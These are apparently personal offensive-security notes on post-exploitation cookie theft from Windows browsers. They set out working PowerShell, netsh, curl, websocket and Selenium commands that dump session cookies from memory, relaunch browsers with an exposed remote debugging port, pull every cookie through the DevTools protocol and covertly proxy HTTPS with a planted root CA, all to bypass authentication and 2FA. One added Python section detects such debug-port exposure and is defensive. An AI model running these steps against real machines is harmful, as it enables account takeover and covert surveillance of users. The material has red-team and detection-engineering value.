## Theory
Once we have admin rights on the target, we can focus on getting the user's cookies and injecting them into our own sessions, thus bypassing authentication + 2FA.
We can do this multiple ways:
1. Dumping the memory of the browser and searching for cookie strings in the memory dumps.
2. Using the Chromium debug tools to get full access to the browser.
3. Installing Selenium and browser drivers on the target.
4. Using [[Mimikatz]] (DPAPI module) to decrypt the browser databases and read the cookies.
5. Proxying HTTP/S traffic.
Also, generally speaking, once we have control over the target's browser, we can use it for additional purposes and not just to look for cookies:
1. As a proxy for our own internet browsing.
2. To exfiltrate target data by uploading it to sites.
3. To download data to the target.
## 1. Browser Process Memory
Works for any browser.
[[Dumping Process Memory]]
Note that different sites use different cookie names, so an approach similar to [[Project Kai]] works well: exfiltrate the browser DBs and investigate them locally, as most of them are stored unencrypted.
This will show you the sites the target browsed to. Head to those sites on your own machine, see how they store cookies, then search for those cookie names in the browser's memory dumps.
### GitHub example
Authenticated users have the `user_session` cookie set, and searching through the dump files shows this:
```bash
strings -n 20 ./* | grep -i "github.com" | grep -i "user_session"
user_sessiongithub.com/
__Host-user_session_same_sitegithub.com/
__Host-user_session_same_siteNkDPgEv-I_1xW0mahg6WJwYcZKC8DS5522AATx27wjKgOWoggithub.com/b
user_sessionNkDPgEv-I_1xW0jhst6WJwYcZKSIXTI23VAATx27wjKgOWoggithub.com/b
```
The last one is what we're looking for:
```text
Cookie name: user_session
Cookie value: NkDPgEv-I_1xW0jhst6WJwYcZKSIXTI23VAATx27wjKgOWog
Cookie domain: github.com
```
In the browser console on our attack machine, run:
```javascript
document.cookie = "user_session=NkDPgEv-I_1xW0jhst6WJwYcZKSIXTI23VAATx27wjKgOWog"
```
Refresh the page and we're logged in!
## 2. Browser Debugging
### Background
Works on Chromium-based browsers - Brave, Chrome, Edge.
The browser executable can be started with a remote debugging port open; once we connect to that debugger we essentially have full control over the browser and can "spy" on whatever the user is doing.
Taking this idea a step further, we could change the browser's shortcut so it always starts with the debugger enabled.
On Windows 10 the shortcuts are located in `C:\ProgramData\Microsoft\Windows\Start Menu\Programs`.
Taking Chrome as an example, head to Properties and change the "Target" field (requires Admin):
```text
Original
"C:\Program Files\Google\Chrome\Application\chrome.exe"
Modified
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222
```
This can be done with PowerShell like so:
```powershell
$shell = New-Object -COM WScript.Shell
$shortcut = $shell.CreateShortcut("C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk")
$shortcut.Arguments = "--remote-debugging-port=9222"
$shortcut.Save()
```
### Details
Headless mode doesn't work when a user data directory is specified, so we have to kill the running browser process and restart it with the debug port:
```powershell
Get-Process chrome | Stop-Process
Start-Process "chrome.exe" -ArgumentList '--remote-debugging-port=9222'
Start-Process "chrome.exe" -ArgumentList '--remote-debugging-port=9222 --restore-last-session'
Start-Process "Brave" -ArgumentList '--remote-debugging-port=9222 --user-data-dir="C:\Users\Maor\AppData\Local\BraveSoftware\Brave-Browser\User Data" --profile-directory="Profile 1" --restore-last-session'
```
The equivalent plain command lines:
```text
chrome --remote-debugging-port=9222
chrome --remote-debugging-port=9222 https://app.hackthebox.com
chrome --remote-debugging-port=9222 --user-data-dir="C:\Users\Maor\Downloads\chrome\User Data"
```
Create a port-forward and a firewall rule so we can connect to the debug port from the Kali box:
```powershell
netsh interface portproxy add v4tov4 listenport=9222 listenaddress=192.168.186.1 connectport=9222 connectaddress=127.0.0.1
New-NetFirewallRule -Name BrowserDebugger -DisplayName "Open Port 9222" -Direction Inbound -Protocol tcp -LocalPort 9222 -Action Allow -Enabled True
# Remove the port-forward and the firewall rule again
netsh interface portproxy reset
Remove-NetFirewallRule -Name BrowserDebugger
```
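The debug-port launch, the `netsh portproxy` rule and the firewall rule above each leave a process-creation record, and together they form a sequence a defender can alert on. The following is an added example, not part of the original notes: it runs detection logic over constructed Sysmon-style process-creation events (the field names `User`, `Image` and `CommandLine` and all values are assumptions) and correlates a browser's debug port with later port-forward or firewall changes that expose it.

```python
import re

# Constructed sample events (not real telemetry); field names loosely follow Sysmon Event ID 1
EVENTS = [
    {"User": r"CORP\alice", "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222'},
    {"User": r"CORP\alice", "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" https://example.com/'},
    {"User": r"CORP\svc-helpdesk", "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "CommandLine": r'msedge.exe --headless --user-data-dir="C:\Users\alice\AppData\Local\Microsoft\Edge\User Data"'},
    {"User": r"CORP\svc-helpdesk", "Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": "netsh interface portproxy add v4tov4 listenport=9222 listenaddress=10.0.0.5 connectport=9222 connectaddress=127.0.0.1"},
    {"User": r"CORP\svc-helpdesk", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell New-NetFirewallRule -Name dbg -Direction Inbound -Protocol tcp -LocalPort 9222 -Action Allow"},
]

BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe"}
DEBUG_PORT = re.compile(r"--remote-debugging-port=(\d+)", re.I)
USER_DATA_DIR = re.compile(r'--user-data-dir="?[A-Za-z]:\\Users\\([^\\"]+)', re.I)   # captures the profile owner
PORTPROXY = re.compile(r"\bportproxy\s+add\b.*\bconnectport=(\d+)", re.I)
FIREWALL = re.compile(r"New-NetFirewallRule\b.*-LocalPort\s+(\d+)", re.I)

def basename(path):
    """Last backslash-separated component, lower-cased (works for image paths and DOMAIN\\user)."""
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Pass 1 learns which debug ports browsers were launched with; pass 2 flags the launches
    themselves plus any portproxy/firewall change that exposes one of those ports."""
    ports = set()
    for e in events:
        m = DEBUG_PORT.search(e["CommandLine"])
        if m and basename(e["Image"]) in BROWSERS:
            ports.add(int(m.group(1)))
    findings = []
    for e in events:
        cmd, image, user = e["CommandLine"], basename(e["Image"]), basename(e["User"])
        if image in BROWSERS:
            m = DEBUG_PORT.search(cmd)
            if m:
                findings.append(("browser_remote_debugging", image, int(m.group(1))))
            m = USER_DATA_DIR.search(cmd)
            if m and m.group(1).lower() != user:            # profile lives under another user's home
                findings.append(("browser_foreign_profile", image, m.group(1)))
            if m and re.search(r"--headless\b", cmd, re.I):  # a profile opened invisibly to its owner
                findings.append(("browser_headless_profile", image, m.group(1)))
        else:
            for pat, name in ((PORTPROXY, "portproxy_exposes_debug_port"), (FIREWALL, "firewall_opens_debug_port")):
                m = pat.search(cmd)
                if m and int(m.group(1)) in ports:
                    findings.append((name, image, int(m.group(1))))
    return findings
```

Only the port-forward and firewall events that match a port previously seen on a browser command line are reported, so an ordinary `netsh` or firewall change on its own does not fire.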
Browsing to the initial debug JSON page will give us the exact debug URL for each tab:
```bash
curl http://192.168.186.1:9222/json
[ {
"description": "",
"devtoolsFrontendUrl": "/devtools/inspector.html?ws=192.168.186.1:9222/devtools/page/F039EBC93637YEREDC9F7020256QSD9F",
"faviconUrl": "https://app.hackthebox.com/images/HTB-favicon/favicon.ico",
"id": "F039EBC93637YEREDC9F7020256QSD9F",
"title": "Hack The Box :: Dashboard",
"type": "page",
"url": "https://app.hackthebox.com/home",
"webSocketDebuggerUrl": "ws://192.168.186.1:9222/devtools/page/F039EBC93637YEREDC9F7020256QSD9F"
}, {
"description": "",
"devtoolsFrontendUrl": "/devtools/inspector.html?ws=192.168.186.1:9222/devtools/page/CC80C51281472F04AEE9FB5C47C8BF04",
"faviconUrl": "https://app.hackthebox.com/images/HTB-favicon/favicon.ico",
"id": "CC80C51281472F04AEE9FB5C47C8BF04",
"parentId": "F039EBC93637YEREDC9F7020256QSD9F",
"title": "https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfsC98ZAAAAALiRx9c6ab62VUSh8OTADXpF50hr&co=aHR0cHM6Ly9hcHAuaGFja3RoZWJveC5jb206NDQz&hl=en&v=M-QqaF9xk6BpjLH22uHZRhXt&size=invisible&cb=c3vnjgv7qoxv",
"type": "iframe",
"url": "https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfsC98ZAAAAALiRx9c6ab62VUSh8OTADXpF50hr&co=aHR0cHM6Ly9hcHAuaGFja3RoZWJveC5jb206NDQz&hl=en&v=M-QqaF9xk6BpjLH22uHZRhXt&size=invisible&cb=c3vnjgv7qoxv",
"webSocketDebuggerUrl": "ws://192.168.186.1:9222/devtools/page/CC80C51281472F04AEE9FB5C47C8BF04"
} ]
```
We can then access the cookies in two ways.
#### 1. Web Socket Debugger
Connect to the `webSocketDebuggerUrl` using a web socket client:
```bash
wsc ws://192.168.186.1:9222/devtools/page/F039EBC93637YEREDC9F7020256QSD9F
Connected to ws://192.168.186.1:9222/devtools/page/F039EBC93637YEREDC9F7020256QSD9F
> {"id": 1, "method": "Network.getAllCookies"}
All the cookies are returned here...
```
Copy these to a file and use [[tool - jq]] to query it more effectively.
```bash
cat cookies.json | jq '.result.cookies[].domain' | sort -u
".500px.com"
"accounts.google.com"
".ads.linkedin.com"
".adsymptotic.com"
".atlassian.com"
...
cat cookies.json | jq '.result.cookies[] | select(.domain=="www.hackthebox.com")'
...
```
#### 2. Dev-tools URL
Browse to the `devtoolsFrontendUrl` using the same browser as the target (Chrome if Chrome, Edge if Edge).
The tab is only active while the user has it on screen, but even if the tab is inactive we can still manually type in a URL, which forces the browser to load the page and with it the user's stored cookies. We won't see the live feedback, but we will see the cookies load in the dev tools, to which we do have live access:
![[Pasted image 20230930232730.png]]
We can then copy and paste these cookies into our own session.
#### 2.5 Chrome - Inspect
Another way of accessing the above is through `chrome://inspect` (on the attack machine). You can add the target through "*Devices* > *Discover network targets*".
## 3. Selenium
To get the browser version, check the uninstall entries in the registry:
```powershell
$regs = @(
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall",
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall",
    "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall",
    "HKCU:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall"
)
foreach ($reg in $regs) { ls $reg -ErrorAction Ignore | findstr /i chrome }
```
Download the matching ChromeDriver and the Selenium WebDriver .NET assembly, then load the assembly:
```powershell
Add-Type -Path WebDriver.dll # WebDriver.dll taken from the net45 folder of the Selenium .NET package
```
At this point we can pass the same Chromium switches used above to `.AddArgument()`:
```powershell
# Chrome
$options = New-Object OpenQA.Selenium.Chrome.ChromeOptions
$options.AddArgument("--user-data-dir=C:\Users\Maor\AppData\Local\Google\Chrome\User Data\")
$options.AddArgument("--profile-directory=Profile 7")
$driverChrome = New-Object OpenQA.Selenium.Chrome.ChromeDriver -ArgumentList @($options)
# Edge
$options = New-Object OpenQA.Selenium.Edge.EdgeOptions
$options.AddArgument("--user-data-dir=C:\Users\Maor\AppData\Local\Microsoft\Edge\User Data")
$options.AddArgument("--user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36 Edg/101.0.1210.53")
$options.AddArgument("--remote-debugging-port=9222")
$options.AddArgument("--headless")
$edgeDriver = New-Object OpenQA.Selenium.Edge.EdgeDriver -ArgumentList @($options)
```
We can get the cookies through the debugger, or through Selenium:
```powershell
$edgeDriver.Manage().Cookies.AllCookies
```
> In headless mode it wouldn't load the cookies for the saved HackTheBox session, even though it would load the authenticated session itself. Happened only once though, then I couldn't get it to work in headless.
Getting a screenshot:
```powershell
# GetScreenshot() returns a Screenshot object; take its base64 form explicitly
$b64Screenshot = $edgeDriver.GetScreenshot().AsBase64EncodedString
$bytes = [Convert]::FromBase64String($b64Screenshot)
[IO.File]::WriteAllBytes("C:\Users\Maor\Downloads\temp\bla.png", $bytes)
```
## 4. Proxying HTTP/S Traffic
[[2022-07-07_Thu]] - Follow the instructions here - [[Proxying Network Traffic#Windows#Covertly Setting Proxy]] - to enable the system-wide HTTP/S proxy settings and to install Burp's CA as a root CA on the target.
Then, say the target has an authenticated GitHub session in Firefox. As the attacker you can start Firefox on the target and point it at that site; it will send the requests with the saved cookies, which you'll then see because you're proxying and decrypting all the HTTPS traffic:
```powershell
Start-Process firefox -ArgumentList '"github.com"'
```
In Burp:
![[Pasted image 20220707204437.png]]
To disable the proxy [[Proxying Network Traffic#Covertly Setting Proxy|see here]], and to remove the installed CA [[How Does TLS Work#Covertly Installing Root Certificate|see here]].
***
## Footnotes
Resources
- [Pass the Cookie and Pivot to the Clouds](https://embracethered.com/blog/posts/passthecookie/)
- [Stealing Chrome cookies without a password](https://mango.pdf.zone/stealing-chrome-cookies-without-a-password)
- [Hands in the Cookie Jar: Dumping Cookies with Chromium’s Remote Debugger Port](https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e)
- [Cookie Crimes and the new Microsoft Edge Browser](https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/)
- [Post-Exploitation: Abusing Chrome's debugging feature to observe and control browsing sessions remotely](https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/)
- [List of Chromium Command Line Switches](https://peter.sh/experiments/chromium-command-line-switches/)